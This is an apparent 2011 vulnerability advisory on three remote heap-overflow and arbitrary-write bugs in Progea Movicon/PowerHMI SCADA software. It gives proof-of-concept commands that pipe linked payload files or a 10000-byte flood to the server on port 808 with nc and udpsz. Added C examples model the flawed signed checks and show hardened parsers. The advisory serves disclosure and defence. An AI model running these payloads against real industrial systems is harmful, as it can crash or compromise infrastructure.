#######################################################################

                             Luigi Auriemma

Application:  Progea Movicon / PowerHMI
              http://www.progea.com
Versions:     <= 11.2.1085
Platforms:    Windows
Bug:          memory corruption
Exploitation: remote
Date:         13 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Movicon is an Italian SCADA/HMI software package.


#######################################################################

========
2-1) Bug
========


When the software runs a project it listens on TCP port 808 and accepts
a limited set of HTTP requests.

The server is affected by a heap overflow: the Content-Length field is
read as a signed number, so a negative value is accepted and reaches
"memcpy(heap_buffer, input, content_length_size)" as a huge unsigned
size, corrupting the heap.


#######################################################################

=============
3-1) The Code
=============


http://aluigi.org/poc/movicon_1.dat
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17842-1.dat

  nc SERVER 808 < movicon_1.dat


#######################################################################

========
2-2) Bug
========


When the software runs a project it listens on TCP port 808 and accepts
a limited set of HTTP requests.

The server is affected by a heap overflow because the incoming HTTP
request is stored in a buffer of 8192 bytes and its length is not
checked against that size, so a longer request overruns the buffer.
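The following C program is an added example and not Progea's code. The
server's real request parser is not public, so the vulnerable pattern it
models for bug 2-1 (a signed Content-Length handed to memcpy) and the
8192-byte request buffer of bug 2-2 come only from the descriptions
above; the body cap MAX_BODY, the status codes and all function names are
assumptions of the example. It shows the byte count memcpy would receive
for a Content-Length of -1 next to a hardened reader that refuses any
request whose headers do not end within 8192 bytes and parses
Content-Length as an unsigned, bounded number, run over constructed
inputs that mirror the two proofs of concept.

```c
#include <ctype.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define REQ_BUF_SIZE 8192            /* request buffer size named in 2-2 */
#define MAX_BODY     (1024u * 1024u) /* assumed body cap for the hardened reader */

enum req_status { REQ_OK = 0, REQ_INCOMPLETE, REQ_HEADER_TOO_LONG, REQ_BAD_LENGTH };

/* Model of the 2-1 pattern (assumed; the real parser is not public): a signed
 * Content-Length handed to memcpy, whose size_t parameter turns -1 into
 * SIZE_MAX. Returns the count memcpy would get; it performs no copy. */
size_t legacy_memcpy_size(const char *content_length_value)
{
    int content_length = atoi(content_length_value);
    return (size_t)content_length;
}

/* Hardened Content-Length: leading blanks, unsigned digits only (no sign),
 * nothing else, at most cap (assumed to fit in long long). Value or -1. */
long long parse_content_length(const char *value, size_t cap)
{
    while (*value == ' ' || *value == '\t')
        value++;
    if (!isdigit((unsigned char)*value))      /* rejects "", "-1", "+5" */
        return -1;
    errno = 0;
    char *end;
    unsigned long long v = strtoull(value, &end, 10);
    while (*end == ' ' || *end == '\t')
        end++;
    if (errno == ERANGE || *end != '\0' || v > cap)
        return -1;
    return (long long)v;
}

/* Hardened reader over the bytes received so far: the header block must end
 * with "\r\n\r\n" within the first REQ_BUF_SIZE bytes or the request is refused
 * before anything is copied onward (2-2); Content-Length is then validated
 * (2-1). On REQ_OK *content_length is the body size, 0 if the header is absent. */
enum req_status read_request(const unsigned char *data, size_t len, size_t *content_length)
{
    char hdr[REQ_BUF_SIZE + 1];
    size_t scan = len < REQ_BUF_SIZE ? len : REQ_BUF_SIZE;
    memcpy(hdr, data, scan);
    hdr[scan] = '\0';                   /* a NUL inside the headers ends the scan too */
    char *terminator = strstr(hdr, "\r\n\r\n");
    if (terminator == NULL)
        return len >= REQ_BUF_SIZE ? REQ_HEADER_TOO_LONG : REQ_INCOMPLETE;
    terminator[2] = '\0';               /* keep one "\r\n" so every line ends in '\n' */
    for (char *p = hdr; *p; p++)        /* header names are ASCII: fold case in place */
        *p = (char)tolower((unsigned char)*p);
    const char *value = strstr(hdr, "\ncontent-length:");
    if (value == NULL) { *content_length = 0; return REQ_OK; }
    value += sizeof "\ncontent-length:" - 1;
    char line[32];
    size_t i = 0;
    for (; value[i] != '\r' && value[i] != '\0'; i++) {
        if (i + 1 >= sizeof line)
            return REQ_BAD_LENGTH;      /* absurdly long value: refuse, never truncate */
        line[i] = value[i];
    }
    line[i] = '\0';
    long long n = parse_content_length(line, MAX_BODY);
    if (n < 0)
        return REQ_BAD_LENGTH;
    *content_length = (size_t)n;
    return REQ_OK;
}

/* Whole request as a C string: validated body length on REQ_OK, else -status. */
long long request_body_length(const char *request)
{
    size_t cl = 0;
    enum req_status st = read_request((const unsigned char *)request, strlen(request), &cl);
    return st == REQ_OK ? (long long)cl : -(long long)st;
}

/* What "udpsz -T -b 0x61 SERVER 808 10000" sends: 10000 x 'a' (constructed here). */
long long demo_oversized_request(void)
{
    char req[10001];
    memset(req, 0x61, 10000);
    req[10000] = '\0';
    return request_body_length(req);
}

int main(void)
{
    printf("Content-Length -1 -> memcpy size %zu, reader %lld\n", legacy_memcpy_size("-1"),
           request_body_length("POST / HTTP/1.0\r\nContent-Length: -1\r\n\r\n"));
    printf("10000 x 'a' -> reader %lld\n", demo_oversized_request());
    return 0;
}
```

Build with any C99 compiler (for example gcc -std=c99). The reader never
copies more than REQ_BUF_SIZE bytes and refuses instead of truncating, so
the same code rejects both the negative Content-Length of 2-1 and the
10000-byte request of 2-2, and a real server would answer 413 or simply
close the connection at that point.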


#######################################################################

=============
3-2) The Code
=============


http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15707.zip

  udpsz -T -b 0x61 SERVER 808 10000

(10000 bytes of 0x61 sent over TCP to port 808)


#######################################################################

========
2-3) Bug
========


When the software runs a project it listens on TCP port 808 and accepts
a limited set of HTTP requests, and on port 12233 for a proprietary
"EIDP" protocol.

An oversized size field in an "EIDP" packet tunnelled through the web
service on port 808 (the bug does not seem to be reachable through port
12233 directly) lets an attacker write a single 0x00 byte at an
arbitrary address higher than 0x7fffffff:

  00a29001 c6041100        mov     byte ptr [ecx+edx],0  ds:0023:80616161=??

A 32-bit Windows process normally has no user-mode memory above
0x7fffffff, so there the write only crashes the server; this limitation
could make the bug interesting only in some 64-bit environments, where
the process can have memory above that address.
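Added example, not Progea's code: the EIDP wire format is not public, so
only the handling of the size field is modelled. The assumed root cause, a
bound check performed on the field as a signed 32-bit value while the
terminator write uses it as an unsigned index, is one pattern consistent
with the observation above that only addresses with the top bit set are
reachable; it is not confirmed by the advisory. EIDP_BUF_SIZE, the buffer
base and the size values below are constructed. The block shows the check
that lets such a field through, where the 0x00 write lands, why that
address is outside the default user-mode range of a 32-bit Windows
process, and the unsigned check that refuses the field.

```c
#include <stdint.h>
#include <stdio.h>

#define EIDP_BUF_SIZE 4096u   /* assumed size of the receive buffer */

/* Assumed legacy check: the size field is compared as a signed 32-bit value,
 * so any value with bit 31 set (>= 0x80000000) is "negative", passes the
 * upper bound and is later used unchanged as an unsigned index.
 * Returns 1 if the packet would be accepted. */
int eidp_size_accepted_legacy(uint32_t size_field)
{
    int32_t size = (int32_t)size_field;   /* 0x80001000 -> negative */
    return size <= (int32_t)EIDP_BUF_SIZE;
}

/* Hardened check: unsigned comparison, and the terminator byte itself must
 * land inside the buffer. */
int eidp_size_accepted(uint32_t size_field)
{
    return size_field < EIDP_BUF_SIZE;
}

/* Where "mov byte ptr [ecx+edx],0" lands: ecx = buffer base, edx = size
 * field. The 32-bit wraparound is intentional; it is what the CPU does. */
uint32_t eidp_terminator_address(uint32_t buffer_base, uint32_t size_field)
{
    return buffer_base + size_field;
}

/* A 32-bit Windows process by default owns only the lower 2 GB, so an
 * address with bit 31 set is outside its user-mode range and the write
 * faults, which is the limitation the advisory notes. */
int in_default_32bit_user_range(uint32_t address)
{
    return address < 0x80000000u;
}

/* Hardened terminator write over a real buffer: refuses instead of indexing
 * out of bounds. Returns 1 when the byte was written. */
int eidp_terminate(unsigned char *buf, uint32_t buf_len, uint32_t size_field)
{
    if (size_field >= buf_len)
        return 0;
    buf[size_field] = 0;
    return 1;
}

/* Self-check on a local buffer: an oversized field is refused, a sane one is
 * written and touches nothing else. Returns 1 when both hold. */
int demo_hardened_terminate(void)
{
    unsigned char buf[64];
    for (uint32_t i = 0; i < sizeof buf; i++)
        buf[i] = 0xff;
    int rejected = eidp_terminate(buf, sizeof buf, 0x80001000u) == 0;
    int written  = eidp_terminate(buf, sizeof buf, 10u) == 1 && buf[10] == 0 && buf[9] == 0xff;
    return rejected && written;
}

int main(void)
{
    uint32_t oversized = 0x80001000u;   /* constructed: any value with bit 31 set */
    uint32_t base = 0x00a20000u;        /* constructed buffer base */
    printf("legacy accepts 0x%08x: %d, hardened: %d\n", oversized,
           eidp_size_accepted_legacy(oversized), eidp_size_accepted(oversized));
    printf("write lands at 0x%08x, inside 32-bit user range: %d\n",
           eidp_terminator_address(base, oversized),
           in_default_32bit_user_range(eidp_terminator_address(base, oversized)));
    return 0;
}
```

The two checks differ only in signedness, which is the whole bug class: a
bound check that is done in signed arithmetic on a field the attacker
controls rejects nothing above 0x7fffffff. Comparing as unsigned, against
the real buffer length, closes it regardless of the address space size.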


#######################################################################

=============
3-3) The Code
=============


http://aluigi.org/poc/movicon_3.dat
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17842-3.dat

  nc SERVER 808 < movicon_3.dat


#######################################################################

======
4) Fix
======


No fix.


#######################################################################